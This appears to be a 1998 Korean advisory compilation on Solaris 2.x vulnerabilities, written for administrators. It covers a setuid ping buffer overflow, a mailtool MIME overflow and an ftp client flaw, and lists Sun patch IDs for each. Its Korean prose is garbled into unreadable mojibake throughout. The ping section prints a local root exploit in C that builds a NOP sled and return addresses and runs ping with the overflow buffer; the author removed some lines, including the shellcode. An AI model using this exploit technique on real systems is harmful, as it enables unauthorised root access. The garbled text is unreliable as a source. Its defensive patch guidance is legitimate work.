¸Ó¸®¸»
ÀÌ
¹®¼´Â Solaris 2.x (2.3~2.6) OS Áß ½É°¢ÇÑ security »óÀÇ ¹®Á¦¸¦ ÀÏÀ¸Å°´Â ¹ö±×µé¿¡ ´ëÇØ »ó¼¼È÷ ¼³¸íÇßÀ¸¸ç, ±× ÇØ°áÃ¥À» Á¦½ÃÇÏ°í ÀÖ´Ù. SunOS 4.x , Solaris 2.0 , Solaris 2.1 , Solaris 2.2 ¿¡ ÇØ´çµÇ´Â ¹ö±×µµ ÀÖÀ¸³ª ÀÌ ºÎºÐ¿¡ ´ëÇÑ ¾ð±ÞÀº ÇöÀç ´ëºÎºÐÀÇ SUN ½Ã½ºÅÛÀÌ Solaris 2.3 ~ Solaris 2.6 ¹öÀüÀ» žÀçÇÏ°í ÀÖÀ½À» ¹Ý¿µÇÏ¿© ¼³¸íÀ» »ý·«ÇÏ¿´´Ù. ÇÏÁö¸¸ Ÿ OS ¿¡µµ °øÅëÀ¸·Î Á¸ÀçÇÏ´Â critical ÇÑ ¹ö±×ÀÇ °æ¿ì¿¡´Â ¾ð±ÞÀ» ÇÏ¿´´Ù. ÀÌ ¹®¼¿¡¼ ÁÖ·Î Âü°í·Î »ïÀº ¹®¼´Â Sun Security Bulletin À̸ç bugtraq µî°ú °°Àº ¸ÞÀϸµ ¸®½ºÆ®ÀÇ ÇØÅ· ½ºÅ©¸³Æ®, ÇÁ·Î±×·¥°ú ÇÔ²² ¹èÆ÷µÇ´Â Åä·Ð³»¿ë, ¹ö±×¿¡ ´ëÇÑ ¼³¸íµéµµ ÂüÁ¶ÇÏ¿´´Ù.¡¡
ÀÌ
¹®¼´Â À§ÀÇ Âü°í¹®ÇåµéÀ» ±â¹ÝÀ¸·Î »ï°í Àֱ⠶§¹®¿¡, Solaris 2.x »ó¿¡ Á¸ÀçÇÏ´Â ¸ðµç º¸¾È»óÀÇ ¹®Á¦Á¡À» ´Ù·é °ÍÀÌ ¾Æ´Ï¶ó´Â °ÍÀ» Àؾ ¾ÈµÈ´Ù. ²÷ÀÓ¾øÀÌ SUN ¿¡¼ Á¦°øÇÏ´Â ÆÐÄ¡µéÀ» ºÎÁö·±È÷ Àû¿ëÇÏ´Â °ÍÀÌ Áß¿äÇÏ´Ù°í »ý°¢ÇÑ´Ù.¡¡
º°°Í
¾Æ´Ñ ¹®¼Áö¸¸ ÀÌ ¹®¼°¡ ±¹³» °ü¸®Àڵ鿡°Ô µµ¿òÀÌ µÇ±æ ¹Ù¶õ´Ù.¡¡
Copyright
ÀÌ
¹®¼¿¡ ´ëÇÑ ¸ðµç ±Ç¸®´Â ±Û¾´ÀÌÀÎ ±èÈÖ°(sakai@major.kaist.ac.kr) ¿¡ ÀÖÀ¸¸ç, ±Û¾´ÀÌÀÇ ÀúÀÛ±ÇÀ» ¸í½ÃÇØ ÁÖ°í, »ó¾÷ÀûÀÎ ¸ñÀû¿¡ »ç¿ëÇÏÁö ¾Ê´Â ÇÑ, ÀÌ ±ÛÀÇ ÀϺΠȤÀº ÀüºÎ¸¦ º¯Çü¾øÀÌ º¹»ç, ¹èÆ÷ÇÏ´Â °ÍÀ» Çã¿ëÇÕ´Ï´Ù.¡¡
15. ping (1998/9/9) ; bug id #174
1.
ÇØ´ç ÇÁ·Î±×·¥ping (1M)
2.
ÇØ´ç ½Ã½ºÅÛSunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3, 4.1.4 , 4.1.3_U1
3. Description of Bugs
ping
Àº SunOS ¿¡¼ ¿¹Àü¿¡µµ ½É°¢ÇÑ ¹®Á¦¸¦ ÀÏÀ¸Å² ÀûÀÌ ÀÖ¾ú´ø ÇÁ·Î±×·¥À̸ç setuid root ÇÁ·Î±×·¥ÀÌ´Ù. ping Àº ICMP ÇÁ·ÎÅäÄÝÀÇ ECHO_REQUEST µ¥ÀÌÅͱ׷¥À» »ç¿ëÇؼ network gateway ³ª ÁöÁ¤ÇÑ host ·ÎºÎÅÍ ECHO_RESPONSE °¡ Àü¼ÛµÇ¾î ¿À´ÂÁö¸¦ üũÇÏ¿© network gateway ³ª host ÀÇ alive À¯¹«¸¦ üũÇÒ ¼ö ÀÖ´Ù.ÀÌ
ping ÇÁ·Î±×·¥¿¡¼ buffer overflow ¸¦ ÀÏÀ¸ÄѼ ·ÎÄ®À¯Àú¶ó¸é ´©±¸³ª root ÀÇ ±ÇÇÑÀ» ¾ò°Ô µÉ ¼ö ÀÖ´Â ¹ö±×°¡ Á¸ÀçÇÑ´Ù.¾Æ·¡¿¡
÷ºÎÇÑ ÇÁ·Î±×·¥Àº ÇöÀç ÇØÄ¿µé »çÀÌ¿¡¼ ¾²ÀÌ°í ÀÖ´Â ping ÇØÅ· ÇÁ·Î±×·¥ÀÌ´Ù. ºÎÀÛ¿ëÀ» ¿ì·ÁÇØ ÄÚµåÀÇ ÀϺκÐÀ» »èÁ¦Çß´Ù.¡¡
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
¡¡
#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013
......................
¡¡
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
¡¡
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);
long_p = (u_long *) buf;
for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i<code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i<EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx\n", targ_addr);
execl("/usr/sbin/ping", "ping", buf, (char *) 0);
perror("execl failed");
}
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®¡¡
SunOS |
Patch ID |
SunOS 5.6 |
106448-01 |
SunOS 5.6_x86 |
106449-01 |
SunOS 5.5.1 |
103699-02 |
SunOS 5.5.1_x86 |
103700-02 |
SunOS 5.5 |
106446-01 |
SunOS 5.5_x86 |
106447-01 |
SunOS 5.4 |
106451-01 |
SunOS 5.4_x86 |
106452-01 |
SunOS 5.3 |
106450-01 |
SunOS 4.1.4 |
103297-02 |
SunOS 4.1.3_U1 |
106546-01 |
¡¡
5. References
Sun Security Bulletin #174
http://sunsolve1.sun.com/pub-cgi/us/sec2html?secbull/174¡¡
16. mailtool (1998/9/9) ; bugid #175
1.
ÇØ´ç ÇÁ·Î±×·¥mailtool
2.
ÇØ´ç ½Ã½ºÅÛSunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3, 4.1.4 , 4.1.3_U1
3. Description of Bugs
ÀÌ
¹ö±×´Â "CERT Advisory CA-98.10, Buffer Overflow in MIME-aware Mail and News Clients" ¾îµå¹ÙÀÌÀú¸®¿¡ ¾ð±ÞµÈ °Í°ú ¸¶Âù°¡Áö·Î MIME ŸÀÔÀ» ó¸®ÇØ ÁÖ´Â ¸ÞÀÏŬ¶óÀ̾ðÆ®¿Í ´º½ºÅ¬¶óÀ̾ðÆ®¿¡ Á¸ÀçÇϴµ¥ , SunOS ÀÇ °æ¿ì mailtool , dtmail ¿¡ ÀÌ ¹ö±×°¡ Á¸ÀçÇÑ´Ù.ÀÌ
¾îµå¹ÙÀÌÀú¸®¿¡¼´Â mailtool ÀÇ °æ¿ì¸¸ ´Ù·ç¾î º¸±â·Î ÇÏ°Ú´Ù.¡¡
mailtool
ÀÇ ¹ö±×´Â CA-98.10 °ú ¿¬°üµÈ °Í¸¸ ÀÖ´Â °ÍÀÌ ¾Æ´Ï´Ù. ¿¹Àü¿¡µµ SunOS 5.5¿¡¼ vacation ±â´ÉÀ» enable ½ÃŲ °æ¿ì ½Éº¼¸¯ ¸µÅ©¸¦ üũÇÏÁö ¾Ê¾Æ¼ ÆÄ»ýµÇ´Â ¹®Á¦Á¡µµ Á¸ÀçÇß¾ú´Ù.mailtool
Àº OpenWindows ȯ°æ¿¡¼ ¾²ÀÌ´Â mail client ÀÌ´Ù. ÀÌ mailtool ¿¡ buffer overflow ¸¦ ÀÏÀ¸Å°´Â ¹®Á¦Á¡ÀÌ Á¸ÀçÇÑ´Ù. À̸¦ ÀÌ¿ëÇÏ¿© ÇØÄ¿°¡ ÀÓÀÇÀÇ Ä¿¸Çµå¸¦ ¿ø°Ý¿¡¼ ½ÇÇà½Ãų ¼ö ÀÖ°Ô µÇ¾î ½Ã½ºÅÛÀ» ¸Á°¡¶ß¸®°Å³ª root ÀÇ ±ÇÇÑÀ» ¾ò´Â ÀÏÀÌ °¡´ÉÇØÁø´Ù.¡¡
Âü°í·Î
OS º°·Î ÀÚ¼¼È÷ »ìÆ캸¸é ´ÙÀ½°ú °°´Ù.¡¡
Æ÷ÇÔµÈ
mutt ÇÁ·Î±×·¥ ³»¿¡ ¹ö±×°¡ Á¸ÀçÇÑ´Ù. ¾Æ·¡ÀÇ »çÀÌÆ®¿¡¼ mutt ¸¦ ¾÷±×·¹À̵å Çϵµ·Ï ÇÑ´Ù.DG/UX ¿¡´Â ¹®Á¦Á¡ÀÌ Á¸ÀçÄ¡ ¾Ê´Â´Ù.
Fujitsu »çÀÇ OS ÀÎ UXP/V ¿¡´Â ¹®Á¦Á¡ÀÌ Á¸ÀçÄ¡ ¾Ê´Â´Ù.
HP-UX ¿Í CDE ÆÐÅ°Áö¸¦ »ç¿ëÇÏ´Â °æ¿ì CDE ¿¡ Æ÷ÇԵǾî ÀÖ´Â dtmail ¿¡ ¹®Á¦Á¡ÀÌ Á¸ÀçÇÑ´Ù. ÆÐÄ¡´Â ÇöÀç °³¹ßÁßÀÌ´Ù.
Lotus Notes ¿¡ ¹®Á¦Á¡ÀÌ Á¸ÀçÇÏ´ÂÁö Á¶»çÁßÀÌ´Ù.
¡¡
¾Æ·¡ÀÇ
MS security bulletin À» ÂüÁ¶Çϱ⠹ٶõ´Ù. http://www.microsoft.com/security/bulletins/ms98-008.htmmutt ´Â free software À̱⠶§¹®¿¡ OS ¿¡ °ü°è¾øÀÌ mutt ¸¦ ¼³Ä¡ÇÑ È£½ºÆ®¿¡¼´Â ¼³Ä¡µÈ mutt ÀÇ ¹öÀü¿¡ µû¶ó ¹®Á¦Á¡ÀÌ Á¸ÀçÇÒ ¼ö ÀÖ´Ù.
Mutt 0.93.1(i) ÀÌÇÏ ¹öÀü¿¡¼´Â ¹®Á¦Á¡ÀÌ Á¸ÀçÇÑ´Ù. ¾Æ·¡ÀÇ »çÀÌÆ®¿¡¼ 0.93.2(i) ¹öÀüÀ¸·Î ¾÷±×·¹À̵å Çϱ⠹ٶõ´Ù.
ftp://ftp.guug.de/pub/mutt/¹®Á¦Á¡ÀÌ
Á¸ÀçÄ¡ ¾Ê´Â´Ù.NetBSD
¿¡¼ Á¦°øµÇ´Â mutt ÆÐÅ°Áö¿Í pine ÆÐÅ°Áö¿¡ ¹ö±×°¡ Á¸ÀçÇÑ´Ù.¾Æ·¡ÀÇ
À¥»çÀÌÆ®¸¦ ÂüÁ¶Çϱ⠹ٶõ´Ù.¹®Á¦Á¡ÀÌ
Á¸ÀçÄ¡ ¾Ê´Â´Ù.Pegasus Mail
¿¡´Â ¹®Á¦Á¡ÀÌ Á¸ÀçÄ¡ ¾Ê´Â´Ù.Eudora Pro Email, Eudora Pro CommCenter ,Eudora Light
¿¡¼´Â º° ¹®Á¦Á¡ÀÌ ¾ø´Ù´Â ÀÚ»çÀÇ Á¶»ç°á°ú°¡ ³ª¿Ô´Ù.¾Æ·¡ÀÇ
product ¿¡´Â ¹®Á¦Á¡ÀÌ Á¸ÀçÄ¡ ¾Ê´Â´Ù.¡¡
SCO UnixWare 7
ÀÇ dtmail ¿¡´Â ¹ö±×°¡ Á¸ÀçÇÑ´Ù. ÆÐÄ¡°¡ µÉ ¶§±îÁö mailx ³ª Netscape Navigator ¸¦ »ç¿ëÇؼ attach µÈ ¸ÞÀÏÀ» Àб⠹ٶõ´Ù.¡¡
ÃֽŹöÀüÀÎ
4.02 ¿¡µµ buffer overflow ¸¦ ÀÏÀ¸Å³ ¼ö ÀÖ´Â ¹®Á¦Á¡ÀÌ Á¸ÀçÇÑ´Ù.¾Æ·¡ÀÇ
»çÀÌÆ®¿¡¼ ¼Ò½ºÆÐÄ¡¸¦ °¡Á®¿Í¼ ÆÐÄ¡¸¦ Çϰųª 4.02A ¹öÀü (ÆÐÄ¡Æ÷ÇÔ) À¸·Î ¾÷±×·¹À̵å Çϱ⠹ٶõ´Ù. ftp://ftp.cac.washington.edu/pine/pine4.02A.patch
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®¡¡
SunOS |
Patch ID |
SunOS 5.6 |
|
SunOS 5.6_x86 |
|
SunOS 5.5.1 |
|
SunOS 5.5.1_x86 |
|
SunOS 5.5 |
|
SunOS 5.5_x86 |
|
SunOS 5.4 |
|
SunOS 5.4_x86 |
|
SunOS 5.3 |
|
SunOS 4.1.4 |
|
SunOS 4.1.3_U1 |
|
Âü°í·Î
ÆÐÄ¡¸¦ Àû¿ëÇÒ ¶§ , required ÆÐÄ¡°¡ ¼³Ä¡µÇ¾î¾ß¸¸ ÇÑ´Ù. Âü°í·Î Solaris 2.5.1 ¸Ó½®¿¡¼ »çÀü¿¡ ÇÊ¿äÇÑ ÆÐÄ¡¸¦ ÇÏÁö ¾Ê°í ÆÐÄ¡¸¦ ½ÇÇà½ÃÄ×À» ¶§ÀÇ ¿¹ÀÌ´Ù.¡¡
Solaris2.5.1_machine# ./installpatch .
Checking installed packages and patches...
ERROR: This patch requires the following patches
which have not been applied to the system:
103566-36 106663-01 106662-01 103901-11
¡¡
Installpatch is terminating.
¡¡
5. References
¡¡
17. ftp (1998/9/30) ; bugid #176
1.
ÇØ´ç ÇÁ·Î±×·¥ftp
2.
ÇØ´ç ½Ã½ºÅÛSunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3, 4.1.4 , 4.1.3_U1
3. Description of Bugs
A vulnerability has been discovered in ftp client software whereby a malicious ftp server can trick the ftp client into executing arbitrary commands.
°íÀÇÀûÀ¸·Î
ftp server ¿¡¼ ftp client °¡ ÀÓÀÇÀÇ Ä¿¸Çµå¸¦ ½ÇÇà½Ãų ¼ö ÀÖµµ·Ï Á¶ÀÛÇÒ ¼ö ÀÖ´Â ¹®Á¦Á¡ÀÌ ftp client ¼ÒÇÁÆ®¿þ¾î¿¡¼ ¹ß°ßµÇ¾ú´Ù.4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®¡¡
SunOS |
Patch ID |
SunOS 5.6 |
106522-01 |
SunOS 5.6_x86 |
106523-01 |
SunOS 5.5.1 |
103603-09 |
SunOS 5.5.1_x86 |
103604-09 |
SunOS 5.5 |
103577-09 |
SunOS 5.5_x86 |
103578-09 |
SunOS 5.4 |
101945-60 (9 ÁÖ À̳»¿¡ ¹èÆ÷µÉ ¿¹Á¤ ) |
SunOS 5.4_x86 |
101946-53 (9 ÁÖ À̳»¿¡ ¹èÆ÷µÉ ¿¹Á¤) |
SunOS 5.3 |
101653-02 |
SunOS 4.1.4 |
104477-04 |
SunOS 4.1.3_U1 |
104454-04 |
¡¡
5. References
¡¡
¡¡